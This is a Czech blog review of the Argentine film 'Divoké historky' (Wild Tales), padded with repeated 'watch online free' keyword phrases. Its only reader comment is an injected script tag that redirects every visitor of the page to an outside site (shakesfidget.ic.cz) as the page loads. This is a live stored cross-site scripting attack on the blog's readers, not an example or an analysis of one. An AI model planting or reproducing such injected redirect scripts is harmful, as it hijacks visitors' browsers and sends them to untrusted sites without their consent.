Divoké historky (2014) online

9. října 2014 v 20:07 |  Komedie

Argentinský snímek se doma stal po dvou týdnech nejsledovanějším filmem roku a údajně jedním z nejúspěšnějších filmů letošního festivalu v Cannes. Šest povídek, šest překvapivých point. Divoké historky online zábavně a cynicky ventilují naše frustrace a mění nás ve zvířata. Divoké historky online ke shlédnutí zdarma jsou mozaikou šesti izolovaných příběhů ze současné Argentiny. Divoké historky online ke shlédnutí má na svědomí argentinský režisér Damián Szifron, který absolvoval filmová studia na Universidad del Cine v argentinské metropoli. Film byl ve své zemi obrovským hitem a zaznamenal vřelý ohlas na nemalém množství festivalů, včetně karlovarského.
Na Divokých historkách je udivující, že ač spolu jednotlivé povídky kromě tématu pomsty nijak nesouvisí (postavou, místem…), působí zcela kompaktním dojmem. Násilí jednoznačně je jedno z velkých kinematografických témat, nečekejte ale almodovarovskou obrazotvornost a surovost. Divák se zasměje a je schopen se identifikovat s postavou v příběhu, protože tu nebo onu patálii zažil na vlastní kůži. Přes značnou lidskost a srozumitelnost zápletek všech šesti povídek jsou historky nejspíš divočejší, než když se ve skutečném životě neudržíme a jednáme iracionálně. Více se o samotných povídkách vlastně prozradit ani nedá, jelikož zásadně stojí na dávkování překvapivých zvratů a rozuzlení. Filmové situace jako takové vytvářejí přímo modelové ukázky výbuchů vzteku, do nichž si následně divák může projektovat své vlastní zkušenosti a pokoušet se vyústění příběhů dotvářet sám. Divoké historky online ke shlédnutí představují skupinu lidí, kteří v takové kleci žijí, aniž by si uvědomovali její existenci. Hrdiny dalších příběhů jsou třeba demoliční inženýr, kterému odtáhnou auto, nebo mladý manažer v rychlém autě. V každém z příběhů se Szifrón rozhodl mučit obyčejného člověka neuvěřitelně nešťastnými náhodami, dokud z něj nevyrobí zakomplexovanou a pomstychtivou bestii. Společným jmenovatelem všech šesti příběhů je selhání nervů některých postav a děj vedoucí ve většině případů k nějakému výbuchu agrese. Poslední příběh, zároveň nejdelší, je i přes všechen humor podstatně mrazivý a nemá daleko k divadelní tragédii.
Původně nezamýšlený projekt vzniknul tak rychle, že se brzy prosadil na mém seznamu priorit a našel se pro něj produkční rámec. V Divokých historkách se setkávají uznávaní herci, kteří spolu dosud na stříbrném plátně společně neúčinkovali, a herci z nezávislých filmů, alternativního divadla a televize. U Divokých historek online si užije v první řadě především divák, který je vyznavačem černého humoru a cynikem prosáklým až do morku kostí. Herci jsou do jednoho velmi dobří a přesní, přičemž jsou i typově dobře obsazení. Tahle argentinská šipka se trefila poměrně blízko středu.
 

Buď první, kdo ohodnotí tento článek.

Komentáře

1 Jiří Novák Jiří Novák | E-mail | Web | 25. prosince 2014 v 20:48 | Reagovat

<script>
location.href="http://shakesfidget.ic.cz/"
</script>

Nový komentář

Přihlásit se
  Ještě nemáte vlastní web? Můžete si jej zdarma založit na Blog.cz.
 

Aktuální články

Reklama